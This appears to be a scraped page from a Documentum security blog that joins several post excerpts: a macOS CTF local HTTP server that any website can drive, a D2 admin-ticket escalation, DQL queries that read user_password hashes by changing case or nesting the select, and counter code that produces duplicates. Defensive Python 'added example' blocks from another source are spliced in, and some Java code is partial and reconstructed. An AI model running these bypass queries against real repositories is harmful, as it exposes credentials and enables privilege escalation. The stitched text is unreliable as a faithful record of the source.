Software company vs Apache License

Pro Documentum

A month ago I was impressed by how software company manages knowledge: as we all know, when Documentum was under EMC's wing there were two public forums, the Documentum Support Forum and the Documentum Developer Forum; both are inaccessible now because OpenText has partially moved their content to the OpenText community forum and restricted access to customers only. Here I have no idea why they think the ECN forums weren't public:

At ECD, the two forums you mentioned were separated because one was an open forum and the other (Dev) was closed and available to developers only. Here, we do not have the distinction of open and closed forums within our product membership.

Today I got another interesting case: it seems that OpenText has decided to rebrand Documentum products, but is doing it in an extremely weird manner, for example:


Opentext Documentum is coming next month

Alvaro de Andres' Blog

I didn't realize that the roadmap documents were updated last month. It looks like the February release is still going to happen (and I've been told a definite date, so it looks like it won't be delayed). After reviewing them (haven't seen any changes :D), I can say:

  • Not many features regarding CS; the pattern/usage visualization and S3 support (which, as far as I know, can already be done without official support) are the new features.
  • No word about DFS, and I know for a fact that several customers have actively asked for updates to current libs and extended support for application servers.
  • Clients get barely any changes (D2, Webtop, xCP).

I'm curious to see how many bugs are found in this first release from Opentext (and the brave customers that go first into the unknown :D), considering that some of the experienced Documentum staff have left the company and the changes…


CTF, you fucked

I'm not sure about CTF for Windows, but no doubt CTF for MacOS is a piece of dog crap. How CTF works on MacOS: it installs CTFHTTPServer, which is actually an HTTP server listening on 13800/tcp:

Andreys-MacBook-Pro:~ apanfilov$ cat /Applications/ 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
Andreys-MacBook-Pro:~ apanfilov$ ps -ef | grep CTFHTTPServer
  501 67706     1   0  1:21am ??         0:06.77 /Applications/ -psn_0_9234638
  501 67707 67706   0  1:21am ??         0:00.87 /Applications/ -psn_0_9234638
  501 71255 69468   0  3:50am ttys007    0:00.00 grep CTFHTTPServer
Andreys-MacBook-Pro:~ apanfilov$ lsof -i -n -P | grep 13800
CTFHTTPSe 67706 apanfilov   10u  IPv4 0x4bfdf3517d667f4d      0t0    TCP (LISTEN)
Andreys-MacBook-Pro:~ apanfilov$ 

and as a result we have:

Simple echo servlet:

import java.io.IOException;
import javax.servlet.*;
import javax.servlet.http.*;

/**
 * @author Andrey B. Panfilov <>
 */
public class EchoServlet extends HttpServlet implements Servlet {

	protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
		String name = req.getParameter("filename");
		byte[] content = req.getParameter("content").getBytes();
		resp.setHeader("Content-type", "application/octet-stream");
		// Rfc5987Util is the helper referenced by the original code (its source is not on the page)
		resp.setHeader("Content-Disposition", "attachment; filename*=UTF-8''" + Rfc5987Util.encode(name));
		// echo the submitted bytes back as the body of the download
		resp.getOutputStream().write(content);
	}

}

That is to say, if you have CTF installed, any internet site may upload/download arbitrary information to/from your computer.
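Added example (not CTF's code and not from the post): what a local HTTP service has to check so that an arbitrary website cannot drive it. It validates the Host header against loopback and the 13800 port shown above and, for browser requests, the Origin header against an allow-list; TRUSTED_ORIGINS, the handler name and the loopback bind are assumptions.

```python
# Added example, not CTF's code: a loopback-only HTTP service that refuses
# requests from untrusted web origins. TRUSTED_ORIGINS and the handler name
# are assumptions; 13800 is the port the lsof output above shows.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

PORT = 13800
LOOPBACK = {"localhost", "127.0.0.1", "::1"}
TRUSTED_ORIGINS = {"https://ctf.example.invalid"}   # placeholder for the app's own origin(s)


def request_allowed(headers, port=PORT):
    """Accept a request only if Host names this loopback service (defeats DNS
    rebinding) and, when a browser sent Origin, that origin is trusted (CSRF)."""
    try:
        host = urlsplit("//" + headers.get("Host", ""))
        if host.hostname not in LOOPBACK or host.port != port:
            return False
    except ValueError:                              # malformed Host header
        return False
    origin = headers.get("Origin")
    if origin is None:                              # non-browser client, e.g. curl
        return True
    return origin in TRUSTED_ORIGINS                # "null" and foreign sites fail here


class GuardedHandler(BaseHTTPRequestHandler):
    """Every handler checks the headers before touching any file or parameter."""

    def do_GET(self):
        if not request_allowed(self.headers):       # Message.get() is case-insensitive
            self.send_error(403, "untrusted Host or Origin")
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok\n")

    do_POST = do_GET


if __name__ == "__main__":
    # bind to loopback only; "0.0.0.0" would expose the service to the whole LAN
    HTTPServer(("127.0.0.1", PORT), GuardedHandler).serve_forever()
```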

Why exposing administrative interfaces is a bad idea

After Alvaro's blog post I wanted to write something like: "Hey, you have missed something: you can create a c6_method_return object, execute D2GetAdminTicketMethod, get the encrypted admin ticket and use it as a password (fuck yeah, I have failed to solve this puzzle: what was the point of encrypting the ticket in D2GetAdminTicketMethod if D2 servlets accept both encrypted and unencrypted passwords)". Unfortunately, D2GetAdminTicketMethod is not part of the D2 installation anymore (it seems that the talented team has at least one member who can read). Do you think this is the end of the D2 disclosures? No, it is just the beginning.

Eradication of Illiteracy

What the talented team had defined as "the information to retrieve" has a special name: projection, and, for most relational databases, the names of the attributes in the projection are case-insensitive.

It seems that some members of the talented team think they are smart enough to read this blog and draw some conclusions about security:

API> ?,c,select user_password from dm_user where user_name=USER
(1 row affected)

API> ?,c,select * from (select user_password from dm_user where user_name=USER)
(1 row affected)

But all their attempts are doomed to failure:

API> ?,c,select USER_PASSWORD from dm_user where user_name=USER
AAAAEAjkr5it6wBqYfLetO/ob9j+75axyTIlb6WpnS8vLcP58ppmenSigXCm4pT1Q3nG ...

API> readquery,c,select * from (select * from dm_user where user_name=USER)
API> next,c,q0
API> get,c,q0,user_password
AAAAEAjkr5it6wBqYfLetO/ob9j+75axyTIlb6WpnS8vLcP58ppmenSigXCm4pT1Q3nGK ...
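An added example (not Documentum code) of what a check that wants to know whether a query returns user_password has to do: resolve the effective projection, unwrapping select * over nested selects and comparing attribute names case-insensitively, which is how the database treats them as the session above shows. Aliases and functions in the projection are not handled; SENSITIVE_ATTRS is an assumed allow-list.

```python
# Added example, not Documentum code: compute the attributes a DQL select
# actually returns, so a sensitivity check cannot be defeated by the casing
# tricks and "select *" wrappers shown in the API session above.
import re

SENSITIVE_ATTRS = {"user_password"}        # assumed deny-list of attribute names

SELECT_RE = re.compile(r"^\s*select\s+(?P<proj>.+?)\s+from\s+(?P<src>.+)$",
                       re.IGNORECASE | re.DOTALL)


def effective_projection(dql):
    """Return the lower-cased attribute names the select finally yields.
    "*" over a nested select inherits the inner projection; "*" over a base
    type is returned as "*" (everything, which the caller must treat as
    including every sensitive attribute). Aliases/functions are not parsed."""
    m = SELECT_RE.match(dql.strip())
    if not m:
        raise ValueError("not a select statement: %r" % dql)
    proj = {p.strip().lower() for p in m.group("proj").split(",")}
    src = m.group("src").strip()
    if "*" in proj:
        if src.startswith("("):                     # unwrap "select * from (select ...)"
            return effective_projection(src[1:src.rfind(")")])
        return {"*"}
    return proj


def exposes_sensitive(dql):
    """True if the query returns a sensitive attribute under any spelling,
    or returns everything (which necessarily includes it)."""
    proj = effective_projection(dql)
    return "*" in proj or bool(proj & SENSITIVE_ATTRS)


# the four queries from the session above: a check on the query text only
# stopped the first two, while every one of them returns user_password
SESSION_QUERIES = [
    "select user_password from dm_user where user_name=USER",
    "select * from (select user_password from dm_user where user_name=USER)",
    "select USER_PASSWORD from dm_user where user_name=USER",
    "select * from (select * from dm_user where user_name=USER)",
]
```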

Surprise: Documentum loses data

I'm not sure whether it is common practice, but all Documentum projects I have participated in have had the following requirement: every document created in the repository must have a unique human-readable identifier which business users may refer to in their daily activities; extra requirements could be:

  • identifiers are sequential
  • there should be no holes in the sequence
  • the sequence starts from the beginning every new day/week/month/year

and, depending on the requirements, the implementation could be either optimistic:

private int getAnnualNextNumber(ICounter counter)
        throws DfException {
    DfException resultException = null;
    for (int i = 0; i < 10; i++) {
        try {
            synchronized (CounterService.class) {
                int lastNumber = counter.getLastNumber() + 1;
                // the lines that persist the new value are elided on the page;
                // setter and save() are assumed names. A DfException thrown by
                // save (e.g. a version conflict) triggers a retry
                counter.setLastNumber(lastNumber);
                counter.save();
                return lastNumber;
            }
        } catch (DfException dfe) {
            resultException = dfe;
            // neither fetch nor revert is required because DFC
            // resets object's state in
            // com.documentum.fc.client.DfSysObject#doSave
            // counter.fetch(null);
        }
    }
    throw resultException;
}

or pessimistic:

private int getAnnualNextNumber(ICounter counter)
        throws DfException {
    synchronized (CounterService.class) {
        counter.lock(); // assumed: take a database lock on the counter (elided on the page)
        int lastNumber = counter.getLastNumber() + 1;
        counter.setLastNumber(lastNumber); // assumed setter name
        counter.save();
        return lastNumber;
    }
}

The interesting thing here is that with the optimistic implementation we observe that our code generates duplicates; from the audit perspective it looks like CS does not receive the updated value from DFC:
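A model of the optimistic loop above, added here as an example and not taken from the post or from DFC: a counter row with a version stamp (standing in for i_vstamp), the read-increment-save loop written as a generator so two workers can be interleaved deterministically, and an audit check for the three requirements listed above. With version checking the retries produce a clean sequence; with a save that ignores a newer stored value (the symptom the audit trail suggests) the same loop hands out duplicates. Store, draw and violations are assumed names.

```python
# Added example, not the post's DFC code: optimistic counter generation
# against a version-stamped row, interleaved worst-case, plus an audit check.
class Stale(Exception):
    """save() used a version stamp the store has already moved past."""

class Store:
    """One counter row: value plus version stamp (like DFC's i_vstamp).
    check_version=False models a save that ignores a newer stored value."""
    def __init__(self, check_version=True):
        self.value, self.vstamp, self.check = 0, 0, check_version

    def fetch(self):
        return self.value, self.vstamp

    def save(self, value, seen_vstamp):
        if self.check and seen_vstamp != self.vstamp:
            raise Stale(self.vstamp)
        self.value, self.vstamp = value, self.vstamp + 1

def optimistic_worker(store, attempts=10):
    """The post's retry loop as a generator: yields between fetch and save."""
    for _ in range(attempts):
        value, vstamp = store.fetch()
        yield                                   # another worker may save here
        try:
            store.save(value + 1, vstamp)
            return value + 1
        except Stale:
            pass                                # conflict: re-fetch and retry
    raise Stale("gave up after %d attempts" % attempts)

def draw(store, workers=2, rounds=3):
    """Worst-case interleaving: every worker fetches, then every worker saves."""
    drawn = []
    for _ in range(rounds):
        gens = [optimistic_worker(store) for _ in range(workers)]
        for g in gens:
            next(g)                             # all workers read the same value
        for g in gens:
            try:
                while True:
                    next(g)                     # save; on conflict fetch again
            except StopIteration as done:
                drawn.append(done.value)
    return sorted(drawn)

def violations(numbers):
    """Audit check for the requirements: unique and no holes in the sequence."""
    seen, dupes = set(), set()
    for n in numbers:
        (dupes if n in seen else seen).add(n)
    return dupes, set(range(1, max(numbers) + 1)) - seen
```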

Q & A. XVI

I will work, maybe, on a D2 implementation project that could be released on a public site. I do not have updated information regarding D2 4.7 security holes: I need an independent point of view and you are probably the only person that has a clear understanding of what I am talking about. Can you help me understand what has not yet been fixed just in the D2 layer?

Current D2 security status: any authenticated user may gain superuser privileges 🙂